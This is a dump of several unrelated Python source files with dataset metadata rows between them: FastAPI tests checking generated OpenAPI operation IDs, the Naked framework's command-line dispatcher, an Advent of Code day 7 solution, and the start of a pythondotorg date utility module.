},
}
def test_router_include_overrides_generate_unique_id():
app = FastAPI(generate_unique_id_function=custom_generate_unique_id)
router = APIRouter(generate_unique_id_function=custom_generate_unique_id2)
@app.post("/", response_model=List[Item], responses={404: {"model": List[Message]}})
def post_root(item1: Item, item2: Item):
return item1, item2 # pragma: nocover
@router.post(
"/router", response_model=List[Item], responses={404: {"model": List[Message]}}
)
def post_router(item1: Item, item2: Item):
return item1, item2 # pragma: nocover
app.include_router(router, generate_unique_id_function=custom_generate_unique_id3)
client = TestClient(app)
response = client.get("/openapi.json")
data = response.json()
assert data == {
"openapi": "3.0.2",
"info": {"title": "FastAPI", "version": "0.1.0"},
"paths": {
"/": {
"post": {
"summary": "Post Root",
"operationId": "foo_post_root",
"requestBody": {
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/Body_foo_post_root"
}
}
},
"required": True,
},
"responses": {
"200": {
"description": "Successful Response",
"content": {
"application/json": {
"schema": {
"title": "Response Foo Post Root",
"type": "array",
"items": {"$ref": "#/components/schemas/Item"},
}
}
},
},
"404": {
"description": "Not Found",
"content": {
"application/json": {
"schema": {
"title": "Response 404 Foo Post Root",
"type": "array",
"items": {
"$ref": "#/components/schemas/Message"
},
}
}
},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
}
},
"/router": {
"post": {
"summary": "Post Router",
"operationId": "bar_post_router",
"requestBody": {
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/Body_bar_post_router"
}
}
},
"required": True,
},
"responses": {
"200": {
"description": "Successful Response",
"content": {
"application/json": {
"schema": {
"title": "Response Bar Post Router",
"type": "array",
"items": {"$ref": "#/components/schemas/Item"},
}
}
},
},
"404": {
"description": "Not Found",
"content": {
"application/json": {
"schema": {
"title": "Response 404 Bar Post Router",
"type": "array",
"items": {
"$ref": "#/components/schemas/Message"
},
}
}
},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
}
},
},
"components": {
"schemas": {
"Body_bar_post_router": {
"title": "Body_bar_post_router",
"required": ["item1", "item2"],
"type": "object",
"properties": {
"item1": {"$ref": "#/components/schemas/Item"},
"item2": {"$ref": "#/components/schemas/Item"},
},
},
"Body_foo_post_root": {
"title": "Body_foo_post_root",
"required": ["item1", "item2"],
"type": "object",
"properties": {
"item1": {"$ref": "#/components/schemas/Item"},
"item2": {"$ref": "#/components/schemas/Item"},
},
},
"HTTPValidationError": {
"title": "HTTPValidationError",
"type": "object",
"properties": {
"detail": {
"title": "Detail",
"type": "array",
"items": {"$ref": "#/components/schemas/ValidationError"},
}
},
},
"Item": {
"title": "Item",
"required": ["name", "price"],
"type": "object",
"properties": {
"name": {"title": "Name", "type": "string"},
"price": {"title": "Price", "type": "number"},
},
},
"Message": {
"title": "Message",
"required": ["title", "description"],
"type": "object",
"properties": {
"title": {"title": "Title", "type": "string"},
"description": {"title": "Description", "type": "string"},
},
},
"ValidationError": {
"title": "ValidationError",
"required": ["loc", "msg", "type"],
"type": "object",
"properties": {
"loc": {
"title": "Location",
"type": "array",
"items": {
"anyOf": [{"type": "string"}, {"type": "integer"}]
},
},
"msg": {"title": "Message", "type": "string"},
"type": {"title": "Error Type", "type": "string"},
},
},
}
},
}
def test_subrouter_top_level_include_overrides_generate_unique_id():
app = FastAPI(generate_unique_id_function=custom_generate_unique_id)
router = APIRouter()
sub_router = APIRouter(generate_unique_id_function=custom_generate_unique_id2)
@app.post("/", response_model=List[Item], responses={404: {"model": List[Message]}})
def post_root(item1: Item, item2: Item):
return item1, item2 # pragma: nocover
@router.post(
"/router", response_model=List[Item], responses={404: {"model": List[Message]}}
)
def post_router(item1: Item, item2: Item):
return item1, item2 # pragma: nocover
@sub_router.post(
"/subrouter",
response_model=List[Item],
responses={404: {"model": List[Message]}},
)
def post_subrouter(item1: Item, item2: Item):
return item1, item2 # pragma: nocover
router.include_router(sub_router)
app.include_router(router, generate_unique_id_function=custom_generate_unique_id3)
client = TestClient(app)
response = client.get("/openapi.json")
data = response.json()
assert data == {
"openapi": "3.0.2",
"info": {"title": "FastAPI", "version": "0.1.0"},
"paths": {
"/": {
"post": {
"summary": "Post Root",
"operationId": "foo_post_root",
"requestBody": {
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/Body_foo_post_root"
}
}
},
"required": True,
},
"responses": {
"200": {
"description": "Successful Response",
"content": {
"application/json": {
"schema": {
"title": "Response Foo Post Root",
"type": "array",
"items": {"$ref": "#/components/schemas/Item"},
}
}
},
},
"404": {
"description": "Not Found",
"content": {
"application/json": {
"schema": {
"title": "Response 404 Foo Post Root",
"type": "array",
"items": {
"$ref": "#/components/schemas/Message"
},
}
}
},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
}
},
"/router": {
"post": {
"summary": "Post Router",
"operationId": "baz_post_router",
"requestBody": {
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/Body_baz_post_router"
}
}
},
"required": True,
},
"responses": {
"200": {
"description": "Successful Response",
"content": {
"application/json": {
"schema": {
"title": "Response Baz Post Router",
"type": "array",
"items": {"$ref": "#/components/schemas/Item"},
}
}
},
},
"404": {
"description": "Not Found",
"content": {
"application/json": {
"schema": {
"title": "Response 404 Baz Post Router",
"type": "array",
"items": {
"$ref": "#/components/schemas/Message"
},
}
}
},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
}
},
"/subrouter": {
"post": {
"summary": "Post Subrouter",
"operationId": "bar_post_subrouter",
"requestBody": {
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/Body_bar_post_subrouter"
}
}
},
"required": True,
},
"responses": {
"200": {
"description": "Successful Response",
"content": {
"application/json": {
"schema": {
"title": "Response Bar Post Subrouter",
"type": "array",
"items": {"$ref": "#/components/schemas/Item"},
}
}
},
},
"404": {
"description": "Not Found",
"content": {
"application/json": {
"schema": {
"title": "Response 404 Bar Post Subrouter",
"type": "array",
"items": {
"$ref": "#/components/schemas/Message"
},
}
}
},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
}
},
},
"components": {
"schemas": {
"Body_bar_post_subrouter": {
"title": "Body_bar_post_subrouter",
"required": ["item1", "item2"],
"type": "object",
"properties": {
"item1": {"$ref": "#/components/schemas/Item"},
"item2": {"$ref": "#/components/schemas/Item"},
},
},
"Body_baz_post_router": {
"title": "Body_baz_post_router",
"required": ["item1", "item2"],
"type": "object",
"properties": {
"item1": {"$ref": "#/components/schemas/Item"},
"item2": {"$ref": "#/components/schemas/Item"},
},
},
"Body_foo_post_root": {
"title": "Body_foo_post_root",
"required": ["item1", "item2"],
"type": "object",
"properties": {
"item1": {"$ref": "#/components/schemas/Item"},
"item2": {"$ref": "#/components/schemas/Item"},
},
},
"HTTPValidationError": {
"title": "HTTPValidationError",
"type": "object",
"properties": {
"detail": {
"title": "Detail",
"type": "array",
"items": {"$ref": "#/components/schemas/ValidationError"},
}
},
},
"Item": {
"title": "Item",
"required": ["name", "price"],
"type": "object",
"properties": {
"name": {"title": "Name", "type": "string"},
"price": {"title": "Price", "type": "number"},
},
},
"Message": {
"title": "Message",
"required": ["title", "description"],
"type": "object",
"properties": {
"title": {"title": "Title", "type": "string"},
"description": {"title": "Description", "type": "string"},
},
},
"ValidationError": {
"title": "ValidationError",
"required": ["loc", "msg", "type"],
"type": "object",
"properties": {
"loc": {
"title": "Location",
"type": "array",
"items": {
"anyOf": [{"type": "string"}, {"type": "integer"}]
},
},
"msg": {"title": "Message", "type": "string"},
"type": {"title": "Error Type", "type": "string"},
},
},
}
},
}
def test_router_path_operation_overrides_generate_unique_id():
app = FastAPI(generate_unique_id_function=custom_generate_unique_id)
router = APIRouter(generate_unique_id_function=custom_generate_unique_id2)
@app.post("/", response_model=List[Item], responses={404: {"model": List[Message]}})
def post_root(item1: Item, item2: Item):
return item1, item2 # pragma: nocover
@router.post(
"/router",
response_model=List[Item],
responses={404: {"model": List[Message]}},
generate_unique_id_function=custom_generate_unique_id3,
)
def post_router(item1: Item, item2: Item):
return item1, item2 # pragma: nocover
app.include_router(router)
client = TestClient(app)
response = client.get("/openapi.json")
data = response.json()
assert data == {
"openapi": "3.0.2",
"info": {"title": "FastAPI", "version": "0.1.0"},
"paths": {
"/": {
"post": {
"summary": "Post Root",
"operationId": "foo_post_root",
"requestBody": {
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/Body_foo_post_root"
}
}
},
"required": True,
},
"responses": {
"200": {
"description": "Successful Response",
"content": {
"application/json": {
"schema": {
"title": "Response Foo Post Root",
"type": "array",
"items": {"$ref": "#/components/schemas/Item"},
}
}
},
},
"404": {
"description": "Not Found",
"content": {
"application/json": {
"schema": {
"title": "Response 404 Foo Post Root",
"type": "array",
"items": {
"$ref": "#/components/schemas/Message"
},
}
}
},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
}
},
"/router": {
"post": {
"summary": "Post Router",
"operationId": "baz_post_router",
"requestBody": {
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/Body_baz_post_router"
}
}
},
"required": True,
},
"responses": {
"200": {
"description": "Successful Response",
"content": {
"application/json": {
"schema": {
"title": "Response Baz Post Router",
"type": "array",
"items": {"$ref": "#/components/schemas/Item"},
}
}
},
},
"404": {
"description": "Not Found",
"content": {
"application/json": {
"schema": {
"title": "Response 404 Baz Post Router",
"type": "array",
"items": {
"$ref": "#/components/schemas/Message"
},
}
}
},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
}
},
},
"components": {
"schemas": {
"Body_baz_post_router": {
"title": "Body_baz_post_router",
"required": ["item1", "item2"],
"type": "object",
"properties": {
"item1": {"$ref": "#/components/schemas/Item"},
"item2": {"$ref": "#/components/schemas/Item"},
},
},
"Body_foo_post_root": {
"title": "Body_foo_post_root",
"required": ["item1", "item2"],
"type": "object",
"properties": {
"item1": {"$ref": "#/components/schemas/Item"},
"item2": {"$ref": "#/components/schemas/Item"},
},
},
"HTTPValidationError": {
"title": "HTTPValidationError",
"type": "object",
"properties": {
"detail": {
"title": "Detail",
"type": "array",
"items": {"$ref": "#/components/schemas/ValidationError"},
}
},
},
"Item": {
"title": "Item",
"required": ["name", "price"],
"type": "object",
"properties": {
"name": {"title": "Name", "type": "string"},
"price": {"title": "Price", "type": "number"},
},
},
"Message": {
"title": "Message",
"required": ["title", "description"],
"type": "object",
"properties": {
"title": {"title": "Title", "type": "string"},
"description": {"title": "Description", "type": "string"},
},
},
"ValidationError": {
"title": "ValidationError",
"required": ["loc", "msg", "type"],
"type": "object",
"properties": {
"loc": {
"title": "Location",
"type": "array",
"items": {
"anyOf": [{"type": "string"}, {"type": "integer"}]
},
},
"msg": {"title": "Message", "type": "string"},
"type": {"title": "Error Type", "type": "string"},
},
},
}
},
}
def test_app_path_operation_overrides_generate_unique_id():
app = FastAPI(generate_unique_id_function=custom_generate_unique_id)
router = APIRouter(generate_unique_id_function=custom_generate_unique_id2)
@app.post(
"/",
response_model=List[Item],
responses={404: {"model": List[Message]}},
generate_unique_id_function=custom_generate_unique_id3,
)
def post_root(item1: Item, item2: Item):
return item1, item2 # pragma: nocover
@router.post(
"/router",
response_model=List[Item],
responses={404: {"model": List[Message]}},
)
def post_router(item1: Item, item2: Item):
return item1, item2 # pragma: nocover
app.include_router(router)
client = TestClient(app)
response = client.get("/openapi.json")
data = response.json()
assert data == {
"openapi": "3.0.2",
"info": {"title": "FastAPI", "version": "0.1.0"},
"paths": {
"/": {
"post": {
"summary": "Post Root",
"operationId": "baz_post_root",
"requestBody": {
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/Body_baz_post_root"
}
}
},
"required": True,
},
"responses": {
"200": {
"description": "Successful Response",
"content": {
"application/json": {
"schema": {
"title": "Response Baz Post Root",
"type": "array",
"items": {"$ref": "#/components/schemas/Item"},
}
}
},
},
"404": {
"description": "Not Found",
"content": {
"application/json": {
"schema": {
"title": "Response 404 Baz Post Root",
"type": "array",
"items": {
"$ref": "#/components/schemas/Message"
},
}
}
},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
}
},
"/router": {
"post": {
"summary": "Post Router",
"operationId": "bar_post_router",
"requestBody": {
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/Body_bar_post_router"
}
}
},
"required": True,
},
"responses": {
"200": {
"description": "Successful Response",
"content": {
"application/json": {
"schema": {
"title": "Response Bar Post Router",
"type": "array",
"items": {"$ref": "#/components/schemas/Item"},
}
}
},
},
"404": {
"description": "Not Found",
"content": {
"application/json": {
"schema": {
"title": "Response 404 Bar Post Router",
"type": "array",
"items": {
"$ref": "#/components/schemas/Message"
},
}
}
},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
}
},
},
"components": {
"schemas": {
"Body_bar_post_router": {
"title": "Body_bar_post_router",
"required": ["item1", "item2"],
"type": "object",
"properties": {
"item1": {"$ref": "#/components/schemas/Item"},
"item2": {"$ref": "#/components/schemas/Item"},
},
},
"Body_baz_post_root": {
"title": "Body_baz_post_root",
"required": ["item1", "item2"],
"type": "object",
"properties": {
"item1": {"$ref": "#/components/schemas/Item"},
"item2": {"$ref": "#/components/schemas/Item"},
},
},
"HTTPValidationError": {
"title": "HTTPValidationError",
"type": "object",
"properties": {
"detail": {
"title": "Detail",
"type": "array",
"items": {"$ref": "#/components/schemas/ValidationError"},
}
},
},
"Item": {
"title": "Item",
"required": ["name", "price"],
"type": "object",
"properties": {
"name": {"title": "Name", "type": "string"},
"price": {"title": "Price", "type": "number"},
},
},
"Message": {
"title": "Message",
"required": ["title", "description"],
"type": "object",
"properties": {
"title": {"title": "Title", "type": "string"},
"description": {"title": "Description", "type": "string"},
},
},
"ValidationError": {
"title": "ValidationError",
"required": ["loc", "msg", "type"],
"type": "object",
"properties": {
"loc": {
"title": "Location",
"type": "array",
"items": {
"anyOf": [{"type": "string"}, {"type": "integer"}]
},
},
"msg": {"title": "Message", "type": "string"},
"type": {"title": "Error Type", "type": "string"},
},
},
}
},
}
def test_callback_override_generate_unique_id():
app = FastAPI(generate_unique_id_function=custom_generate_unique_id)
callback_router = APIRouter(generate_unique_id_function=custom_generate_unique_id2)
@callback_router.post(
"/post-callback",
response_model=List[Item],
responses={404: {"model": List[Message]}},
generate_unique_id_function=custom_generate_unique_id3,
)
def post_callback(item1: Item, item2: Item):
return item1, item2 # pragma: nocover
@app.post(
"/",
response_model=List[Item],
responses={404: {"model": List[Message]}},
generate_unique_id_function=custom_generate_unique_id3,
callbacks=callback_router.routes,
)
def post_root(item1: Item, item2: Item):
return item1, item2 # pragma: nocover
@app.post(
"/tocallback",
response_model=List[Item],
responses={404: {"model": List[Message]}},
)
def post_with_callback(item1: Item, item2: Item):
return item1, item2 # pragma: nocover
client = TestClient(app)
response = client.get("/openapi.json")
data = response.json()
assert data == {
"openapi": "3.0.2",
"info": {"title": "FastAPI", "version": "0.1.0"},
"paths": {
"/": {
"post": {
"summary": "Post Root",
"operationId": "baz_post_root",
"requestBody": {
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/Body_baz_post_root"
}
}
},
"required": True,
},
"responses": {
"200": {
"description": "Successful Response",
"content": {
"application/json": {
"schema": {
"title": "Response Baz Post Root",
"type": "array",
"items": {"$ref": "#/components/schemas/Item"},
}
}
},
},
"404": {
"description": "Not Found",
"content": {
"application/json": {
"schema": {
"title": "Response 404 Baz Post Root",
"type": "array",
"items": {
"$ref": "#/components/schemas/Message"
},
}
}
},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
"callbacks": {
"post_callback": {
"/post-callback": {
"post": {
"summary": "Post Callback",
"operationId": "baz_post_callback",
"requestBody": {
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/Body_baz_post_callback"
}
}
},
"required": True,
},
"responses": {
"200": {
"description": "Successful Response",
"content": {
"application/json": {
"schema": {
"title": "Response Baz Post Callback",
"type": "array",
"items": {
"$ref": "#/components/schemas/Item"
},
}
}
},
},
"404": {
"description": "Not Found",
"content": {
"application/json": {
"schema": {
"title": "Response 404 Baz Post Callback",
"type": "array",
"items": {
"$ref": "#/components/schemas/Message"
},
}
}
},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
}
}
}
},
}
},
"/tocallback": {
"post": {
"summary": "Post With Callback",
"operationId": "foo_post_with_callback",
"requestBody": {
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/Body_foo_post_with_callback"
}
}
},
"required": True,
},
"responses": {
"200": {
"description": "Successful Response",
"content": {
"application/json": {
"schema": {
"title": "Response Foo Post With Callback",
"type": "array",
"items": {"$ref": "#/components/schemas/Item"},
}
}
},
},
"404": {
"description": "Not Found",
"content": {
"application/json": {
"schema": {
"title": "Response 404 Foo Post With Callback",
"type": "array",
"items": {
"$ref": "#/components/schemas/Message"
},
}
}
},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
}
},
},
"components": {
"schemas": {
"Body_baz_post_callback": {
"title": "Body_baz_post_callback",
"required": ["item1", "item2"],
"type": "object",
"properties": {
"item1": {"$ref": "#/components/schemas/Item"},
"item2": {"$ref": "#/components/schemas/Item"},
},
},
"Body_baz_post_root": {
"title": "Body_baz_post_root",
"required": ["item1", "item2"],
"type": "object",
"properties": {
"item1": {"$ref": "#/components/schemas/Item"},
"item2": {"$ref": "#/components/schemas/Item"},
},
},
"Body_foo_post_with_callback": {
"title": "Body_foo_post_with_callback",
"required": ["item1", "item2"],
"type": "object",
"properties": {
"item1": {"$ref": "#/components/schemas/Item"},
"item2": {"$ref": "#/components/schemas/Item"},
},
},
"HTTPValidationError": {
"title": "HTTPValidationError",
"type": "object",
"properties": {
"detail": {
"title": "Detail",
"type": "array",
"items": {"$ref": "#/components/schemas/ValidationError"},
}
},
},
"Item": {
"title": "Item",
"required": ["name", "price"],
"type": "object",
"properties": {
"name": {"title": "Name", "type": "string"},
"price": {"title": "Price", "type": "number"},
},
},
"Message": {
"title": "Message",
"required": ["title", "description"],
"type": "object",
"properties": {
"title": {"title": "Title", "type": "string"},
"description": {"title": "Description", "type": "string"},
},
},
"ValidationError": {
"title": "ValidationError",
"required": ["loc", "msg", "type"],
"type": "object",
"properties": {
"loc": {
"title": "Location",
"type": "array",
"items": {
"anyOf": [{"type": "string"}, {"type": "integer"}]
},
},
"msg": {"title": "Message", "type": "string"},
"type": {"title": "Error Type", "type": "string"},
},
},
}
},
}
def test_warn_duplicate_operation_id():
def broken_operation_id(route: APIRoute):
return "foo"
app = FastAPI(generate_unique_id_function=broken_operation_id)
@app.post("/")
def post_root(item1: Item):
return item1 # pragma: nocover
@app.post("/second")
def post_second(item1: Item):
return item1 # pragma: nocover
@app.post("/third")
def post_third(item1: Item):
return item1 # pragma: nocover
client = TestClient(app)
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
client.get("/openapi.json")
assert len(w) == 2
assert issubclass(w[-1].category, UserWarning)
assert "Duplicate Operation ID" in str(w[-1].message)
| 41.772059
| 106
| 0.285161
| 114
| 0.001672
| 0
| 0
| 3,794
| 0.055653
| 0
| 0
| 19,117
| 0.280423
|
0b5218f0be7a06f3e5bb1ddae6a9fce7c35741e8
| 11,880
|
py
|
Python
|
hbruraldoctor/hbvirtual/lib/python3.7/site-packages/Naked/app.py
|
hallohubo/DjangoDocterAPI
|
2d86d17c718affa968c0b2d4f9590aa08d43716e
|
[
"Apache-2.0"
] | 89
|
2015-04-10T14:34:05.000Z
|
2021-11-08T09:17:09.000Z
|
hbruraldoctor/hbvirtual/lib/python3.7/site-packages/Naked/app.py
|
hallohubo/DjangoDocterAPI
|
2d86d17c718affa968c0b2d4f9590aa08d43716e
|
[
"Apache-2.0"
] | 13
|
2015-03-17T15:44:41.000Z
|
2020-11-19T03:07:13.000Z
|
hbruraldoctor/hbvirtual/lib/python3.7/site-packages/Naked/app.py
|
hallohubo/DjangoDocterAPI
|
2d86d17c718affa968c0b2d4f9590aa08d43716e
|
[
"Apache-2.0"
] | 19
|
2015-05-13T09:18:12.000Z
|
2021-04-28T10:35:39.000Z
|
#!/usr/bin/env python
# encoding: utf-8
#------------------------------------------------------------------------------
# Naked | A Python command line application framework
# Copyright 2014 Christopher Simpkins
# MIT License
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------------
# c.cmd = Primary command (<executable> <primary command>)
# c.cmd2 = Secondary command (<executable> <primary command> <secondary command>)
#
# c.option(option_string, [bool argument_required]) = test for option with optional test for positional arg to the option
# c.option_with_arg(option_string) = test for option and mandatory positional argument to option test
# c.flag(flag_string) = test for presence of a "--option=argument" style flag
#
# c.arg(arg_string) = returns the next positional argument to the arg_string argument
# c.flag_arg(flag_string) = returns the flag assignment for a "--option=argument" style flag
#------------------------------------------------------------------------------------
# Application start
def main():
import sys
from Naked.commandline import Command
#from Naked.toolshed.state import StateObject
from Naked.toolshed.system import stderr
#------------------------------------------------------------------------------------------
# [ Instantiate command line object ]
# used for all subsequent conditional logic in the CLI application
#------------------------------------------------------------------------------------------
c = Command(sys.argv[0], sys.argv[1:])
#------------------------------------------------------------------------------
# [ Instantiate state object ]
#------------------------------------------------------------------------------
#state = StateObject()
#------------------------------------------------------------------------------------------
# [ Command Suite Validation ] - early validation of appropriate command syntax
# Test that user entered a primary command, print usage if not
#------------------------------------------------------------------------------------------
if not c.command_suite_validates():
from Naked.commands.usage import Usage
Usage().print_usage()
sys.exit(1)
#------------------------------------------------------------------------------------------
# [ PRIMARY COMMAND LOGIC ]
# Test for primary commands and handle them
#------------------------------------------------------------------------------------------
#------------------------------------------------------------------------------
# [ args ] - identify the parsed arguments for a command string (2)= help
#------------------------------------------------------------------------------
if c.cmd == "args":
if c.cmd2 == "help":
from Naked.commands.args import help as args_help
args_help()
elif c.argc > 0: # there is an argument to where that is not help
from Naked.commands.args import Args
a = Args(c.arg_to_cmd)
a.run()
else:
stderr("The args command requires an example command as an argument. Use 'naked args help' for more information.", 1)
#------------------------------------------------------------------------------
# [ build ] - build the C code in the Naked library (2)= help
#------------------------------------------------------------------------------
elif c.cmd == "build":
if c.cmd2 == "help":
from Naked.commands.build import help as build_help
build_help()
else:
from Naked.commands.build import compile_c_code
import os, inspect
abs_dirpath = os.path.join(os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe()))), "toolshed", "c")
compile_c_code(abs_dirpath) # function calls exit status code
#------------------------------------------------------------------------------
# [ classify ] - search Python application classifiers and display to user (args)-search string
#------------------------------------------------------------------------------
elif c.cmd == "classify":
if c.cmd2 == "help":
from Naked.commands.classifier import help as classifier_help
classifier_help()
else:
if c.second: # if search string was given
search_string = c.second
else:
search_string = "" # absence of search string detected in Classifier, defaults to the entire list instead of search
from Naked.commands.classifier import Classifier
c = Classifier(search_string)
c.run()
#------------------------------------------------------------------------------
# [ dist ] - distribute source files to PyPI (2)=register, sdist, swheel, wheel, win, all, help
#------------------------------------------------------------------------------
elif c.cmd == "dist":
if c.argc > 1:
from Naked.commands.dist import Dist
d = Dist()
if c.cmd2 == "register": # python setup.py register
d.run('register')
elif c.cmd2 == "sdist": # python setup.py sdist upload
d.run('sdist')
elif c.cmd2 == "swheel": # python setup.py sdist bdist_wheel upload
d.run('swheel')
elif c.cmd2 == "wheel": # python setup.py bdist_wheel upload
d.run('wheel')
elif c.cmd2 == "win": # python setup.py bdist_wininst upload
d.run('win')
elif c.cmd2 == "all": # python setup.py sdist bdist_wheel bdist_wininst upload
d.run('all')
elif c.cmd2 == "help": # help for command
from Naked.commands.dist import help as dist_help
dist_help()
else:
stderr("The naked dist secondary command was not recognized. Use 'naked dist help' for more information.", 1)
else:
stderr("Please enter a secondary command", 1)
#------------------------------------------------------------------------------
# [ locate ] - locate Naked project files (2)= main, settings, setup, help
#------------------------------------------------------------------------------
elif c.cmd == "locate":
from Naked.commands.locate import Locator
if c.cmd2 == "help":
from Naked.commands.locate import help as locate_help
locate_help()
elif c.cmd2 == "main":
l = Locator('main')
elif c.cmd2 == "settings":
l = Locator('settings')
elif c.cmd2 == "setup":
l = Locator('setup')
else:
l = Locator('') #handles error report to user
#------------------------------------------------------------------------------
# [ make ] - make a new Naked project (2)=help (args)=project name
#------------------------------------------------------------------------------
elif c.cmd == "make":
from Naked.commands.make import MakeController
if c.cmd2 == "help":
from Naked.commands.make import help as make_help
make_help()
if c.arg1: # arg1 is not help so use it as the argument to the make command
m = MakeController(c.arg1)
else:
m = MakeController(None)
m.run()
#------------------------------------------------------------------------------
# [ profile ] - run the profiler.py file in the Naked project (2)=help
#------------------------------------------------------------------------------
elif c.cmd == "profile":
if c.cmd2 == "help":
from Naked.commands.profile import help as profile_help
profile_help()
else:
from Naked.commands.profile import Profiler
p = Profiler()
p.run()
#------------------------------------------------------------------------------
# [ pyh ] - help for python built-in library modules, classes, methods, functions
#------------------------------------------------------------------------------
elif c.cmd == "pyh":
if c.cmd2 == "help":
from Naked.commands.pyh import pyh_help
pyh_help()
else:
if c.argc > 1:
from Naked.commands.pyh import python_help
python_help(c.arg1)
else:
stderr("Please enter a query term with the pyh command. Use 'naked pyh help' for more information.", 1)
#------------------------------------------------------------------------------
# [ test ] - Run unit tests on the project (2)= help,nose,pytest,tox,unittest (see help for args)
#------------------------------------------------------------------------------
elif c.cmd == "test":
if c.argc > 1:
if c.cmd2 == "help":
from Naked.commands.test import help as tox_help
tox_help()
elif c.cmd2 == "nose":
from Naked.commands.test import NoseTester
n = NoseTester()
n.run()
elif c.cmd2 == "pytest":
from Naked.commands.test import PyTester
p = PyTester()
p.run()
elif c.cmd2 == "tox":
from Naked.commands.test import ToxTester
if c.arg2: #user specified a python version to run with one of the tox version defs
t = ToxTester(c.arg2) #instantiate with the python version
else:
t = ToxTester()
t.run()
elif c.cmd2 == "unittest":
from Naked.commands.test import UnitTester
if c.arg2:
t = UnitTester(c.arg2)
t.run()
else:
stderr("Please include a unit test file path. Use 'naked test help' for more information.", 1)
else:
stderr("The secondary command was not recognized. Use 'naked test help' for more information.", 1)
else:
stderr("Please include a secondary command with the 'naked test' command. Use 'naked dist help' for more information.", 1)
#------------------------------------------------------------------------------------------
# [ NAKED FRAMEWORK COMMANDS ]
# Naked framework provides default help, usage, and version commands for all applications
# --> settings for user messages are assigned in the lib/PROJECT/settings.py file
#------------------------------------------------------------------------------------------
elif c.help(): # User requested naked help (help.py module in commands directory)
from Naked.commands.help import Help
Help().print_help()
elif c.usage(): # user requested naked usage info (usage.py module in commands directory)
from Naked.commands.usage import Usage
Usage().print_usage()
elif c.version(): # user requested naked version (version.py module in commands directory)
from Naked.commands.version import Version
Version().print_version()
#------------------------------------------------------------------------------------------
# [ DEFAULT MESSAGE FOR MATCH FAILURE ]
# Message to provide to the user when all above conditional logic fails to meet a true condition
#------------------------------------------------------------------------------------------
else:
print("Could not complete the command that you entered. Please try again.")
sys.exit(1) #exit
if __name__ == '__main__':
main()
| 51.652174
| 135
| 0.448485
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 6,913
| 0.581902
|
0b57844b6fc847c94e6d69c32ba1624b13f6dfa7
| 366
|
py
|
Python
|
codes/day7_task1.py
|
tayyrov/AdventOfCode
|
69003407fd345ea76f8125b4b132e5b5d5ea33ab
|
[
"MIT"
] | 1
|
2021-12-07T10:54:48.000Z
|
2021-12-07T10:54:48.000Z
|
codes/day7_task1.py
|
tayyrov/AdventOfCode
|
69003407fd345ea76f8125b4b132e5b5d5ea33ab
|
[
"MIT"
] | null | null | null |
codes/day7_task1.py
|
tayyrov/AdventOfCode
|
69003407fd345ea76f8125b4b132e5b5d5ea33ab
|
[
"MIT"
] | null | null | null |
"""
Advent Of Code 2021
Day 7
Date: 07-12-2021
Site: https://adventofcode.com/2021/day/7
Author: Tayyrov
"""
import sys
file1 = open('../input_files/day7_input', 'r')
numbers = list(map(int, file1.readlines()[0].split(",")))
numbers.sort()
middle = numbers[len(numbers)//2]
ans = 0
for n in numbers:
ans += abs(middle-n)
print(ans)
| 15.25
| 58
| 0.620219
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 147
| 0.401639
|
0b57f9e75344dd34d7fe38dc10faa58dd476ec48
| 4,270
|
py
|
Python
|
events/utils.py
|
ewjoachim/pythondotorg
|
382741cc6208fc56aa827cdd1da41983fb7e6ba8
|
[
"Apache-2.0"
] | null | null | null |
events/utils.py
|
ewjoachim/pythondotorg
|
382741cc6208fc56aa827cdd1da41983fb7e6ba8
|
[
"Apache-2.0"
] | null | null | null |
events/utils.py
|
ewjoachim/pythondotorg
|
382741cc6208fc56aa827cdd1da41983fb7e6ba8
|
[
"Apache-2.0"
] | null | null | null |
import datetime
import re
import pytz
from django.utils.timezone import make_aware, is_aware
def seconds_resolution(dt):
return dt - dt.microsecond * datetime.timedelta(0, 0, 1)
def minutes_resolution(dt):
return dt - dt.second * datetime.timedelta(0, 1, 0) - dt.microsecond * datetime.timedelta(0, 0, 1)
def date_to_datetime(date, tzinfo=None):
if tzinfo is None:
